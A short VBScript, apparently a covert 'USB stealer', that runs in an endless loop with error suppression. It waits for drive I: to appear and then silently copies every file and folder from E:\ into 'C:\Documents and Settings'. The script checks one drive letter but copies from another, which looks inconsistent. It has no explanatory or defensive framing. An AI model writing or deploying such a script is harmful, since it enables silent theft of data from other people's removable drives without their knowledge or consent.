set fso=createobject("scripting.filesystemobject")
set ws=createobject("wscript.shell")
on error resume next
do
wscript.sleep 1000
if fso.driveexists("I:\") then
fso.copyfile "E:\*","C:\Documents and Settings"
fso.copyfolder "E:\*","C:\Documents and Settings"
wscript.sleep 20000
end if
loop